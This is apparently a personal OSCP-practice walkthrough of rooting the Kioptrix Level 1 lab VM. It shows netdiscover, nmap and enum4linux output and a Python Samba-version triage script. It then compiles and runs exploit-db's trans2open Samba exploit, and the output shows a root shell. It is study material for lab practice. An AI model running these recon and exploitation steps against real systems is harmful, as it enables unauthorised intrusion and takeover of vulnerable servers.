I am posting this because I have decided to continue along the OSCP path by working through alternative VMs now that my certification lab time has expired. This is my journey without the safety ropes.
Let's do this, y'all. First up, Kioptrix Level 1.
We do not know the IP address of the machine up front, so the first step is to find it on the local network with netdiscover (run it as root, since it needs raw access to the network interface).
For beginners: make sure the VM's network adapter (in VirtualBox, VMware Player or VMware Workstation) is set to bridged, so the target sits on the same LAN segment as your attacking machine and shows up in the ARP sweep.
In the terminal, type:
netdiscover
Once you have worked out the IP address, which in my case is 192.168.1.104, you need to start doing some recon on the machine.
In the terminal, type (as root; the SYN scan in -sS and the OS detection in -A need raw sockets):
nmap -A -p- -sS 192.168.1.104
nmap gives me back the following results.
Nmap scan report for 192.168.1.104
Host is up (0.00034s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2019-06-11T05:40:02+00:00; -21d17h24m46s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:A4:04:EF (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -21d17h24m46s, deviation: 0s, median: -21d17h24m46s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 271.60 seconds

The nmap scan alone already flags several weak spots: SSHv1 is accepted, SSLv2 with export-grade ciphers is enabled, TRACE is allowed, and the whole Apache 1.3.20 / mod_ssl 2.8.4 / OpenSSL 0.9.6b stack is from 2001. The one I followed is Samba on 139/tcp:
139/tcp open netbios-ssn Samba smbd
Next I want some more detailed information about the Samba service, in particular its exact version, because nmap only reports "Samba smbd" without a version number.
I ran enum4linux against the host, and the OS-information section gave me what I needed:
enum4linux 192.168.1.104

 ========================================
|    OS information on 192.168.1.104    |
 ========================================
[+] Got OS info for 192.168.1.104 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.1.104 from srvinfo:
        KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
        platform_id     :       500
        os version      :       4.5
        server type     :       0x9a03
Now that I know the Samba version is 2.2.1a (the SMB server software, not the SMB protocol version), I can look for a public exploit against that release.
I used exploit-db entry 10, https://www.exploit-db.com/exploits/10, the "samba-2.2.8 < remote root exploit" by eSDee: a remote code execution exploit that gives a root shell on affected Samba 2.2.x servers, and 2.2.1a is squarely in that range.
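The step above (take the version from the SMB banner, decide whether it is inside the range the exploit covers) is worth automating, because version strings with letter suffixes such as 2.2.8a do not compare correctly as plain strings or floats. The script below is an added example written for this post, not code from the walkthrough or from exploit-db. It assumes, as the exploit banner "samba-2.2.8 <" suggests and as the 2.2.8a release notes state, that the trans2open overflow behind exploit-db 10 affects Samba 2.x releases up to and including 2.2.8 and was fixed in 2.2.8a; the sample enum4linux line is the one from this scan, embedded as a constant.

```python
import re

# Affected range assumed by this check (editor's assumption, stated in the
# lead-in): Samba 2.x releases up to and including 2.2.8 are affected by
# the trans2open overflow used by exploit-db 10; 2.2.8a shipped the fix.
VULN_MIN = (2, 0, 0, "")
FIXED_IN = (2, 2, 8, "a")

# Matches the Server=[Samba x.y.z...] field that smbclient / enum4linux print.
SERVER_FIELD_RE = re.compile(r"Server=\[Samba\s+([0-9][0-9A-Za-z.\-]*)\]")


def parse_samba_version(text):
    """Split 'major.minor.patch<suffix>' into a tuple that compares correctly.

    '2.2.1a'        -> (2, 2, 1, 'a')
    '2.2.8'         -> (2, 2, 8, '')
    '3.0.20-Debian' -> (3, 0, 20, '-Debian')
    The suffix stays a string so that 2.2.8 sorts before 2.2.8a ('' < 'a')
    and 2.2.8b sorts after it; numeric parts are compared as integers so
    2.2.10 would sort after 2.2.8.
    """
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(.*)$", text.strip())
    if not m:
        raise ValueError("unrecognised Samba version string: %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))


def is_trans2open_candidate(version):
    """True when the banner version falls inside the assumed affected range."""
    return VULN_MIN <= parse_samba_version(version) < FIXED_IN


def find_samba_version(enum_output):
    """Pull the Samba version out of enum4linux / smbclient OS-info text."""
    m = SERVER_FIELD_RE.search(enum_output)
    return m.group(1) if m else None


def triage(enum_output):
    """Return {'version': ..., 'trans2open_candidate': bool}, or None if no banner."""
    version = find_samba_version(enum_output)
    if version is None:
        return None
    return {"version": version,
            "trans2open_candidate": is_trans2open_candidate(version)}


# Constructed sample: the smbclient line from the enum4linux run above.
SAMPLE_ENUM4LINUX = (
    "[+] Got OS info for 192.168.1.104 from smbclient: "
    "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]\n"
)

if __name__ == "__main__":
    print(triage(SAMPLE_ENUM4LINUX))
    for v in ("2.2.1a", "2.2.8", "2.2.8a", "2.2.8b", "3.0.20-Debian"):
        print(v, "->", "candidate" if is_trans2open_candidate(v) else "not in range")
```

Two caveats a practitioner would keep in mind: the banner is an indicator, not proof, because distributions such as Red Hat backport fixes without bumping the version string, so a 2.2.x banner can be patched and, conversely, a build with the fix removed would not be caught; the only confirmation is running the exploit, which belongs in a lab like this one. And the version came from enum4linux's smbclient probe, not from nmap, which is why the extra enumeration step mattered here.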
The exploit is C source, so I had to compile it first:
gcc 10.c -o kiop1exploit
Then run it against the box, with -b 0 selecting bruteforce mode for a Linux target and -p 139 pointing it at the NetBIOS session port found by nmap:
./kiop1exploit -b 0 -p 139 192.168.1.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
ls
whoami
root
And that is r00t on the machine straight from the exploit, no privilege escalation needed. :) Yay, I did it. First b0x.
"Yippee Kai Yay mfz". -- Bruce Willis
